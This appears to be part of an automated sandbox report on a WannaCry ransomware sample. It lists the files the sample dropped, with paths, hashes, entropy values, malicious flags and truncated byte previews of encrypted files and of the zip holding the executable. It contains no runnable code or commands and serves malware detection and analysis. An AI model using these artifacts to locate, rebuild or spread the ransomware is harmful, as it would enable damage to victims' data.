                                                                                      Preview:WANACRY!.......iG.q..Z..bGpN..x...N*....K#.~.{..Cw.G...c..g..V.W..`S..q.W.E(...9..Y....tJ.L...*....t((....[...".....T...a.2..IP.l3..v..+<iN. G+41.v..}....T..R.LM.*.....Ax..*E.+...;...2L... @X.^..y....+..{...b.N..z.#?-p..w).v....Eh.s..:..5....{.K....[z...................g.w ........$....E.BW..Co.O.L......Cs.n..$oi.=4...!.Gd...@.T2....R......7..r........EB.......#R..H....g.b.{H..%.....".Eo.@...]..rY...d~....+.!..:a-.........x.O..R..I...._.)ox.UB.YC4,.e..~.%tM.2..Qn..."...AQ.).i.@...wv.b.v..?........Z.A..-|..X^`^d..l.x.?E.....Xm..k..~..tm|.~..)....|...G.J...sh..).a.........Rf.7..a..L...D.E.G..D%z.#I...t.H..q.....g."R..D.jS.......~A....e..jr..............n!..zIT......JT..ZD..u.....D0..N..1f.[Vu......=....I.<)N.E\...#....o=j.W_P.V..;5.Kgi...\.....!......}...3C,...p.t.0K...t.Em.$..<3..JY....(.^.j..j........p...G...I..Fi.r..X.L.X...dU.....@.F-...N..u.B..6.A.'.......o.s..S.........V..A........"R...,....d'y.B y...V.k_T.....sh.....l.[...!..o..+...*..R....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.82945049921437
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkk/pWvth0oR7dPBfeWsyGevBQqNLcAdElRV02QM3wlu4:bk+KgE7nspevNpcUElRV02JH4
                                                                                      MD5:D638A851960F850E4387901E2CAE5BE3
                                                                                      SHA1:91BF97D772315104EEA8DBF86823C20E68FE4D4C
                                                                                      SHA-256:E3222969BDE0B3D313710E848149742EEAD1D3298E5F57BBF3C41595D66707E7
                                                                                      SHA-512:40794D0DAF29CDD7AE722BA8A394F25EA36747AE9EF9BE2934932BEA546ACC949CDC3042AE31BBEBB28719CD81CFFEA3973CCCE232797DC8734ED3D674BFC8AA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....I&..B.^cgG....:.nKm(4....pI.b,.l.6f..^r...7.C..U....".!..*.....c@C.:.......`..lS.3...m...1.#....@....:y.,ZI1......;>.%.F..T...rG,.H........]Wpk6r...O.F..W.OE..+.O..C.%`..."."../.:...Z.t.O@7...v..Blf.3P.....<d@B [Z..#.w...}u..jv....@.,..]................v.aw\sx..p.....#f.F;(4.1.r.s..S...m..p.q..r.8.C.....A.H.>.\..V&...g.....s.A........H.lS..(..E...:.4.+......Z...Dj.0.<...........*iYCj....h...J..".|..#(.-_.}u#D...4.....Q....JrB.`.X..s|......D...9..{... -..9;..v.A.@...T..\.............?..O:.._C..i...b.f.T...h..q(o.?........~......J$.3y5.@...U..fms6.i.=..Eq;E.=....I..d'(i......\..Ng......{o;.3....V.]..o.L.5.+~.5.[.......0.....m?K.b4.... r..0..;..../.....o.BQ.pt.....5....,....Khs.^...Dg...%...u.g......c...d..f.....J.d.A.....)T#.!.`.F....:.8(..Iwl#~9c0....%9...\F..K..X...?.Y.....X....g%.........<D.E......g.goU._3p...`w.#...5YI...Dn@0hlr..0..1C...R$.....?.8....s.C...,CZ.hE..@...PhOod.!.N:wRI.7.ssH/.....)F.._.. -.....A....D#.8
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.82945049921437
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkk/pWvth0oR7dPBfeWsyGevBQqNLcAdElRV02QM3wlu4:bk+KgE7nspevNpcUElRV02JH4
                                                                                      MD5:D638A851960F850E4387901E2CAE5BE3
                                                                                      SHA1:91BF97D772315104EEA8DBF86823C20E68FE4D4C
                                                                                      SHA-256:E3222969BDE0B3D313710E848149742EEAD1D3298E5F57BBF3C41595D66707E7
                                                                                      SHA-512:40794D0DAF29CDD7AE722BA8A394F25EA36747AE9EF9BE2934932BEA546ACC949CDC3042AE31BBEBB28719CD81CFFEA3973CCCE232797DC8734ED3D674BFC8AA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....I&..B.^cgG....:.nKm(4....pI.b,.l.6f..^r...7.C..U....".!..*.....c@C.:.......`..lS.3...m...1.#....@....:y.,ZI1......;>.%.F..T...rG,.H........]Wpk6r...O.F..W.OE..+.O..C.%`..."."../.:...Z.t.O@7...v..Blf.3P.....<d@B [Z..#.w...}u..jv....@.,..]................v.aw\sx..p.....#f.F;(4.1.r.s..S...m..p.q..r.8.C.....A.H.>.\..V&...g.....s.A........H.lS..(..E...:.4.+......Z...Dj.0.<...........*iYCj....h...J..".|..#(.-_.}u#D...4.....Q....JrB.`.X..s|......D...9..{... -..9;..v.A.@...T..\.............?..O:.._C..i...b.f.T...h..q(o.?........~......J$.3y5.@...U..fms6.i.=..Eq;E.=....I..d'(i......\..Ng......{o;.3....V.]..o.L.5.+~.5.[.......0.....m?K.b4.... r..0..;..../.....o.BQ.pt.....5....,....Khs.^...Dg...%...u.g......c...d..f.....J.d.A.....)T#.!.`.F....:.8(..Iwl#~9c0....%9...\F..K..X...?.Y.....X....g%.........<D.E......g.goU._3p...`w.#...5YI...Dn@0hlr..0..1C...R$.....?.8....s.C...,CZ.hE..@...PhOod.!.N:wRI.7.ssH/.....)F.._.. -.....A....D#.8
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.858818557776028
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkCWGw8DiHZRbHam37V6Ml15qtLAKdU5NI3alen6HnaNXp9Ec+2jdyhAZ:bkEiHZRbLR1l15qOKdYle6HaxEchkhY
                                                                                      MD5:4C62B14059AE25639ED0F539A7A7830E
                                                                                      SHA1:A55001E89D9395F8CF4145BC0271CC49F7884F23
                                                                                      SHA-256:D7E7037B1D915F9C9BC65A91200FF44088402BB09F049738A986BB676EC480BE
                                                                                      SHA-512:2817D87FFCEB93EDB5255BC811873EA586CE81C322D1A015EDE7D156E481F13BBC165BDFFE695B096DED92ACAE6C68E38E15B8D1FBD3F075FE897D9AC5E54890
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......s..$pC..}D..o.... +....[+....G..@q^K._B..S.A.o..l....S]q..ZI!.3ruN..._.F.u.m8....gA...A....1..k..l{.x7..?..7..@Sg..(......qT.e......!..A..cc..E...p.I..#s...WU..fY......aU.?...Y?..C..`...g\...y.E{.....$@..u..nb.....j.b.-.>......Wh.3.>..........................?..vz.M.?...?...g......Z.q.....r....[d.l4V..+T..F{..Q4]...5....Q.y.C^@N.......~e.o`.9..q....q..U{w........e..i..hu.o.uO-4.....yC.9b.l_A..Sm...,LER...W..B9.~..0M#}. pj;.X..N.+..9.q~.\wts.4p.i.8V....(.@..;R......Q\z:.$5..$.A|........'...Jh.....l...9..@r@....#s.MS......W..x..PM.Y.H.<b.h/RGi...p.f.G..,..).v....+.......8...K?...U...k.7O.e..).z.UDw..R)...)..N~.......+5v.!+.....hy.m.G.....A.&.....S..L........`.Cn....h..Zd.dzO..._C..3..wb{`...'>l.3.U.Q=.......K.n.i.i..f.yax....j..K.._90..g...G.II16.+.....dwq.........7.f.bc..q%....X.N.[...~P.>U..&..P..[..2...;h(V#}...R|..0....}."....e{..Co]W... ..E...c..cN.s.kV..u....3..{..+^.A...%...O^...N..s..t9Wit...k.<...+[.yLb.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.858818557776028
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkCWGw8DiHZRbHam37V6Ml15qtLAKdU5NI3alen6HnaNXp9Ec+2jdyhAZ:bkEiHZRbLR1l15qOKdYle6HaxEchkhY
                                                                                      MD5:4C62B14059AE25639ED0F539A7A7830E
                                                                                      SHA1:A55001E89D9395F8CF4145BC0271CC49F7884F23
                                                                                      SHA-256:D7E7037B1D915F9C9BC65A91200FF44088402BB09F049738A986BB676EC480BE
                                                                                      SHA-512:2817D87FFCEB93EDB5255BC811873EA586CE81C322D1A015EDE7D156E481F13BBC165BDFFE695B096DED92ACAE6C68E38E15B8D1FBD3F075FE897D9AC5E54890
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......s..$pC..}D..o.... +....[+....G..@q^K._B..S.A.o..l....S]q..ZI!.3ruN..._.F.u.m8....gA...A....1..k..l{.x7..?..7..@Sg..(......qT.e......!..A..cc..E...p.I..#s...WU..fY......aU.?...Y?..C..`...g\...y.E{.....$@..u..nb.....j.b.-.>......Wh.3.>..........................?..vz.M.?...?...g......Z.q.....r....[d.l4V..+T..F{..Q4]...5....Q.y.C^@N.......~e.o`.9..q....q..U{w........e..i..hu.o.uO-4.....yC.9b.l_A..Sm...,LER...W..B9.~..0M#}. pj;.X..N.+..9.q~.\wts.4p.i.8V....(.@..;R......Q\z:.$5..$.A|........'...Jh.....l...9..@r@....#s.MS......W..x..PM.Y.H.<b.h/RGi...p.f.G..,..).v....+.......8...K?...U...k.7O.e..).z.UDw..R)...)..N~.......+5v.!+.....hy.m.G.....A.&.....S..L........`.Cn....h..Zd.dzO..._C..3..wb{`...'>l.3.U.Q=.......K.n.i.i..f.yax....j..K.._90..g...G.II16.+.....dwq.........7.f.bc..q%....X.N.[...~P.>U..&..P..[..2...;h(V#}...R|..0....}."....e{..Co]W... ..E...c..cN.s.kV..u....3..{..+^.A...%...O^...N..s..t9Wit...k.<...+[.yLb.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):3481589
                                                                                      Entropy (8bit):7.999940457163727
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:vhvb2BVmAw0p9jIVcEj5nnZNRyA30yBSRT:vhvq7Bu6EZnZN5EyBSN
                                                                                      MD5:EFE76BF09DABA2C594D2BC173D9B5CF0
                                                                                      SHA1:BA5DE52939CB809EAE10FDBB7FAC47095A9599A7
                                                                                      SHA-256:707A9F323556179571BC832E34FA592066B1D5F2CAC4A7426FE163597E3E618A
                                                                                      SHA-512:4A1DF71925CF2EB49C38F07C6A95BEA17752B025F0114C6FD81BC0841C1D1F2965B5DDA1469E454B9E8207C2E0DFD3DF0959E57166620CCFF86EEEB5CF855029
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:PK.........[.J.."@..5...5.D...ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeUT....i.Y.j.Yux.............c..|.!9....T....I..^.Z.@.$:...-.h...*.. ..x{&:....a..........D~&....^A.@N.....(.b..U.a.....f.N)./?...e(...34#.......R.......[).T....Zw.@........?..dsTT.u..PM....qy........@.C.....6..........?./#....BB.....Jq..Gp..`C(.i......m.......b1.q..p.....~...1N-....e...F.O..EWFH.@;..q....E.!!.=.dUyM_hl.[mb}...=..?.bx._.Ey..;.F>.S..G....,R.3qS.:."....QD..........C..p..G6rS.[....~m...s.-..i...O....1N..K.A.M._-|. ...7..~.H*.p..s)C....U.EA27 ......7..$._R'%....7.#....UB...sj....F..O.8.x....^n...].4..yO?..*|..Mdq..^...!zj...2.>{%.F.....?S...8..+.4..=X~.C.<.Sz...42..f........O.-.u-%B.....}~....?.i..D.........Oi.sLF.............. ?.}..I........9...I.E.Z..*(....../.....L.A..Q.%:....&.h.>q.gj......U.Fc(..+m.,.U\u0.*.......B.jNy..Z..h..@...9A}[....#............F.,...e.0.%....w.H.e.eV.7.......9.r(..4.......`..83l.Fx...]X...ll.d........K.l\.E
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3481880
                                                                                      Entropy (8bit):7.999950165233776
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:4Ta6734O19PgCEr6CwCLgWJgAECXcs10XAfHMB/X:4W6l1QsMgWGBs1V2/X
                                                                                      MD5:10361D89D3E4A5D44267838AB0DBB08D
                                                                                      SHA1:49EC084B893DE64D73D7CCD2C42A5FA276285B13
                                                                                      SHA-256:1D22EE06D3F709C40179688F117735ED9CAE4437381A6B9AAC1259EA7E3B8ACE
                                                                                      SHA-512:DE8700D45D01F6F9C3DE338002CA16A5ECCFC135CEA377276DA1F3769C9CDE59494A387AF7B919F5093A213D1245D6721BDEDF5CD79446177F75B4B5A50664C1
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....@CN....aaI...\..c../1...x...G5y.....Y .....fB:....2.....5.X.sN4:...E.4r.........N.'...Y.1H..-.$.......T#......FA...V....x..lZ.....MTdIa..._T)......A..8._..v....!.....:.F.}.7.....+.x..VO.I.u)8:.xtC..z,............w.h,.;...,......O1L.y.?c.C.0.,A............5......Y....2.:.Rl...G.t.X8..?......f...........=...s.{a|..W (....|J.....r..'.....g.5C..A?..y...f..?..<.zO.H.>....55.j.N.....j.C..g.?...b...Vo...u..3.......0.\L.....^.0...1..LRbc.a....wf.gl.0n.l..,..I.....O.u.v.c,..:)...O..f....=........c.pTk...|...uY.;.].V..wR./s.......pP-.7W..)....&Mg......-..d.8.+..C^.q.....@.4.......K.F..F..E.<r..:K.Bal...o.Myw......>.b3x..(...2>\....{...c.h..N..BH..4....U..-'+.!m........t.A.:.w.3...u..n...i....9.M.......X...........3..1.U.]P..8.k."..._>.n......H...>lf..~Y.....8*..H..N4.^i.T...B.+..AD.V..S\.V..;uV...m.W ..E.K.X..@E...U;0........t......Y.T.'..N..b..zu.(.)..u$...'hN..\s7...q;.._..5.71>.K1t..G..q..(6.n....-/O_.f;,;:..a7....9.~O...?o.wv..4]0
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3481880
                                                                                      Entropy (8bit):7.999950165233776
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:4Ta6734O19PgCEr6CwCLgWJgAECXcs10XAfHMB/X:4W6l1QsMgWGBs1V2/X
                                                                                      MD5:10361D89D3E4A5D44267838AB0DBB08D
                                                                                      SHA1:49EC084B893DE64D73D7CCD2C42A5FA276285B13
                                                                                      SHA-256:1D22EE06D3F709C40179688F117735ED9CAE4437381A6B9AAC1259EA7E3B8ACE
                                                                                      SHA-512:DE8700D45D01F6F9C3DE338002CA16A5ECCFC135CEA377276DA1F3769C9CDE59494A387AF7B919F5093A213D1245D6721BDEDF5CD79446177F75B4B5A50664C1
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....@CN....aaI...\..c../1...x...G5y.....Y .....fB:....2.....5.X.sN4:...E.4r.........N.'...Y.1H..-.$.......T#......FA...V....x..lZ.....MTdIa..._T)......A..8._..v....!.....:.F.}.7.....+.x..VO.I.u)8:.xtC..z,............w.h,.;...,......O1L.y.?c.C.0.,A............5......Y....2.:.Rl...G.t.X8..?......f...........=...s.{a|..W (....|J.....r..'.....g.5C..A?..y...f..?..<.zO.H.>....55.j.N.....j.C..g.?...b...Vo...u..3.......0.\L.....^.0...1..LRbc.a....wf.gl.0n.l..,..I.....O.u.v.c,..:)...O..f....=........c.pTk...|...uY.;.].V..wR./s.......pP-.7W..)....&Mg......-..d.8.+..C^.q.....@.4.......K.F..F..E.<r..:K.Bal...o.Myw......>.b3x..(...2>\....{...c.h..N..BH..4....U..-'+.!m........t.A.:.w.3...u..n...i....9.M.......X...........3..1.U.]P..8.k."..._>.n......H...>lf..~Y.....8*..H..N4.^i.T...B.+..AD.V..S\.V..;uV...m.W ..E.K.X..@E...U;0........t......Y.T.'..N..b..zu.(.)..u$...'hN..\s7...q;.._..5.71>.K1t..G..q..(6.n....-/O_.f;,;:..a7....9.~O...?o.wv..4]0
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):3481589
                                                                                      Entropy (8bit):7.999940457163727
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:vhvb2BVmAw0p9jIVcEj5nnZNRyA30yBSRT:vhvq7Bu6EZnZN5EyBSN
                                                                                      MD5:EFE76BF09DABA2C594D2BC173D9B5CF0
                                                                                      SHA1:BA5DE52939CB809EAE10FDBB7FAC47095A9599A7
                                                                                      SHA-256:707A9F323556179571BC832E34FA592066B1D5F2CAC4A7426FE163597E3E618A
                                                                                      SHA-512:4A1DF71925CF2EB49C38F07C6A95BEA17752B025F0114C6FD81BC0841C1D1F2965B5DDA1469E454B9E8207C2E0DFD3DF0959E57166620CCFF86EEEB5CF855029
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:PK.........[.J.."@..5...5.D...ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeUT....i.Y.j.Yux.............c..|.!9....T....I..^.Z.@.$:...-.h...*.. ..x{&:....a..........D~&....^A.@N.....(.b..U.a.....f.N)./?...e(...34#.......R.......[).T....Zw.@........?..dsTT.u..PM....qy........@.C.....6..........?./#....BB.....Jq..Gp..`C(.i......m.......b1.q..p.....~...1N-....e...F.O..EWFH.@;..q....E.!!.=.dUyM_hl.[mb}...=..?.bx._.Ey..;.F>.S..G....,R.3qS.:."....QD..........C..p..G6rS.[....~m...s.-..i...O....1N..K.A.M._-|. ...7..~.H*.p..s)C....U.EA27 ......7..$._R'%....7.#....UB...sj....F..O.8.x....^n...].4..yO?..*|..Mdq..^...!zj...2.>{%.F.....?S...8..+.4..=X~.C.<.Sz...42..f........O.-.u-%B.....}~....?.i..D.........Oi.sLF.............. ?.}..I........9...I.E.Z..*(....../.....L.A..Q.%:....&.h.>q.gj......U.Fc(..+m.,.U\u0.*.......B.jNy..Z..h..@...9A}[....#............F.,...e.0.%....w.H.e.eV.7.......9.r(..4.......`..83l.Fx...]X...ll.d........K.l\.E
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.818642525007652
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkl+7fHnL93Nhga68RGgS3sgRhl4ORuqVkN6S1pkqP5bT+2aWq09sjFJ:bkAnrtTosgd4aVk4S1pkqJS2aWqEsX
                                                                                      MD5:858E7293BA1173ABF760D60F48A874F2
                                                                                      SHA1:EADD93842AD269891E04B708DBD25E4A28AF53E1
                                                                                      SHA-256:786967CAA5A36C3A9E565C63ED356E3A33D12971FB18CBD27229D5ED80ACD70C
                                                                                      SHA-512:9D29718A773FE2C58A3BCEA4BCF7F68967C12824C888B529771C5112DCCF49441B6BC733A210A0CEE5F795EB9E0493A6DAB703CF61D18D1884A865C092E86F19
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......s..1..].f`j.. Z.el.N..0....f.....%4`..dp...Y.`^.s.z.(j.......|.....kU..!1..A+N.m.....S.}.......H..&Da..t........%.=..:..............5...0..I...<..D.p......j.r=...1)..z.h...|.lKG...[..t. (X...p.Z(sY.]_?.Mk.........C.5.....W.YWa9`.<h.8..|O...".............x.c.MhBY1y.;...1a.....R..." .S1b...Z.I~.@.....s.5..ET.]qw........5V/S.|...J........sm...Ek7].K..@.....(7.P..........>.......6%.g ...........)..'..v(]l....Rr.7.`+N.......U..d..7.5.....z.....~.b`.'....(9..3,}V.m.*...V. Vt..]_YS+.......?3uA.Q.gI..._1..~...."..?:h.....@..K.7\.$...N..$EU..t....7rm.I.[w|&S..\..B....Ta..L......... .d.J... ;.6=.1.tyz.u...b..|. K...r.=....\7....?...n.xz.......E...D..h.....XG.[.:..(.......`*.r.A.5(.SP?@...8......H..6.7G_.l.`W(........qLQd ...*..z,..I...rg..W..r.!...@G\.8.=...r..K.... 4f.<..R'G/h.eQ....&.T..n...-.;.7......D.5r...I.,V..R*.e_g`.'..Kqy...Lhr.4o.s.M.W.`a:,,G.... .......4.Z.....j...w...cxTh....a3...5. ...7...U'..(<....l..^7[..y7..g....:.F....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.818642525007652
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkl+7fHnL93Nhga68RGgS3sgRhl4ORuqVkN6S1pkqP5bT+2aWq09sjFJ:bkAnrtTosgd4aVk4S1pkqJS2aWqEsX
                                                                                      MD5:858E7293BA1173ABF760D60F48A874F2
                                                                                      SHA1:EADD93842AD269891E04B708DBD25E4A28AF53E1
                                                                                      SHA-256:786967CAA5A36C3A9E565C63ED356E3A33D12971FB18CBD27229D5ED80ACD70C
                                                                                      SHA-512:9D29718A773FE2C58A3BCEA4BCF7F68967C12824C888B529771C5112DCCF49441B6BC733A210A0CEE5F795EB9E0493A6DAB703CF61D18D1884A865C092E86F19
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......s..1..].f`j.. Z.el.N..0....f.....%4`..dp...Y.`^.s.z.(j.......|.....kU..!1..A+N.m.....S.}.......H..&Da..t........%.=..:..............5...0..I...<..D.p......j.r=...1)..z.h...|.lKG...[..t. (X...p.Z(sY.]_?.Mk.........C.5.....W.YWa9`.<h.8..|O...".............x.c.MhBY1y.;...1a.....R..." .S1b...Z.I~.@.....s.5..ET.]qw........5V/S.|...J........sm...Ek7].K..@.....(7.P..........>.......6%.g ...........)..'..v(]l....Rr.7.`+N.......U..d..7.5.....z.....~.b`.'....(9..3,}V.m.*...V. Vt..]_YS+.......?3uA.Q.gI..._1..~...."..?:h.....@..K.7\.$...N..$EU..t....7rm.I.[w|&S..\..B....Ta..L......... .d.J... ;.6=.1.tyz.u...b..|. K...r.=....\7....?...n.xz.......E...D..h.....XG.[.:..(.......`*.r.A.5(.SP?@...8......H..6.7G_.l.`W(........qLQd ...*..z,..I...rg..W..r.!...@G\.8.=...r..K.... 4f.<..R'G/h.eQ....&.T..n...-.;.7......D.5r...I.,V..R*.e_g`.'..Kqy...Lhr.4o.s.M.W.`a:,,G.... .......4.Z.....j...w...cxTh....a3...5. ...7...U'..(<....l..^7[..y7..g....:.F....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.852804315788735
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk6U2pAgAnAR6NRCb5hRfrto7qj6Mo487nKwau3NPoDwjpg+91hvYIrUREu3nCW0:bk6UjAUNRCb5frMY92F3NQU5rURySE
                                                                                      MD5:0DD29FCC30CC9E045D681E5B10471A28
                                                                                      SHA1:44C7DE156E14BCB3BBF7DDDB60598D22BE82F263
                                                                                      SHA-256:7015F3730C93C46A8E1487208D78D38AD5DC3DDA5ACA5D4BC11F4F3D64FBF082
                                                                                      SHA-512:891C8CAC7B1A832CA47B69F3DF41FF665EE5BBA77E3E0F6DEB49F6C89B2A0055DA98D44E991DB2F18393F3D7DF4BB92C0DA870EE807C7BDCC53A7C24413CC38F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......4......t1...==..X.xo.3...t.. P.Q7.......^...EA...b....|L.|...|.O)6...UWU..D.t`.).+.).....l...r.m.F............5..)..|..[Q@Yy.....i...:)e.*..C~..F.Q.Wj1?d...X..<..+.S?..,...$y...t|..8..}..!./-J.E>.!|.F.......?;.......d.D.;w..f......x..&................."..L?..F." ........*!....a.C...}...uq.\.A..u....&..4.E..........*H.$yI...7..@...g..-.5..zi..A\.(.....L.....|..K.N..y^..O.w.....H..}Zf.v.....<..|<......i..O......./..)*.&.M.....2.)".8;...c......Z..`9.;\D.<...`.$.....0...X#.7F.O...C.w.....]....U...!......N.?...1am%'..(...1_.v.....6.*....Q...............J.~...N..f...F.........0...8..JY.a..P.2;..8N.....m.t~_83..A]..j.8!.....8.+.^n......#..E...[.m.k..."Bp.B..4.U....D.w-.9.....C.?.W..[.8.Ed.<.t.)....L.E..i.^40............1......Q...e....&1....G.R[8O.~.9....P|....`... ......t...i.$.g&...Wa.my..,7...fWe...P..s.V...IIb.....Q^."..,V6.M......=..7....Q.^}...o...9.v.._,:.W\.;f...GT.>E.....W.............o....5q.....*5E.I..C].x\...N0.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.852804315788735
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk6U2pAgAnAR6NRCb5hRfrto7qj6Mo487nKwau3NPoDwjpg+91hvYIrUREu3nCW0:bk6UjAUNRCb5frMY92F3NQU5rURySE
                                                                                      MD5:0DD29FCC30CC9E045D681E5B10471A28
                                                                                      SHA1:44C7DE156E14BCB3BBF7DDDB60598D22BE82F263
                                                                                      SHA-256:7015F3730C93C46A8E1487208D78D38AD5DC3DDA5ACA5D4BC11F4F3D64FBF082
                                                                                      SHA-512:891C8CAC7B1A832CA47B69F3DF41FF665EE5BBA77E3E0F6DEB49F6C89B2A0055DA98D44E991DB2F18393F3D7DF4BB92C0DA870EE807C7BDCC53A7C24413CC38F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......4......t1...==..X.xo.3...t.. P.Q7.......^...EA...b....|L.|...|.O)6...UWU..D.t`.).+.).....l...r.m.F............5..)..|..[Q@Yy.....i...:)e.*..C~..F.Q.Wj1?d...X..<..+.S?..,...$y...t|..8..}..!./-J.E>.!|.F.......?;.......d.D.;w..f......x..&................."..L?..F." ........*!....a.C...}...uq.\.A..u....&..4.E..........*H.$yI...7..@...g..-.5..zi..A\.(.....L.....|..K.N..y^..O.w.....H..}Zf.v.....<..|<......i..O......./..)*.&.M.....2.)".8;...c......Z..`9.;\D.<...`.$.....0...X#.7F.O...C.w.....]....U...!......N.?...1am%'..(...1_.v.....6.*....Q...............J.~...N..f...F.........0...8..JY.a..P.2;..8N.....m.t~_83..A]..j.8!.....8.+.^n......#..E...[.m.k..."Bp.B..4.U....D.w-.9.....C.?.W..[.8.Ed.<.t.)....L.E..i.^40............1......Q...e....&1....G.R[8O.~.9....P|....`... ......t...i.$.g&...Wa.my..,7...fWe...P..s.V...IIb.....Q^."..,V6.M......=..7....Q.^}...o...9.v.._,:.W\.;f...GT.>E.....W.............o....5q.....*5E.I..C].x\...N0.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.857509887509244
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkBKUJhvLCkNUTnVF18UQw1LF3m2vHGHpvhy0QvolvgriY1dD2IKvtQ04SRwCENz:bknJhDCkSTnVr11F/GHztGr91dwvtd4D
                                                                                      MD5:88DD80AA46FC9E81DC1CA86E4208A40A
                                                                                      SHA1:33DC904D2D681CFF1F92C931B826AADA9C50B502
                                                                                      SHA-256:C3E4969DAB5E816C9CD3D55A842B844E10922CE9727437E967C67F5EA7708DA9
                                                                                      SHA-512:2315CD5B822D51801EB66528E246C6A1F50618D3798D9352FBDCB2A4ADEF732F6D35FFEE544DAD0CE6537B614AA6393E7113B9CB9987C35297AA4C2315B79914
                                                                                      Malicious:false
                                                                                      Reputation:low
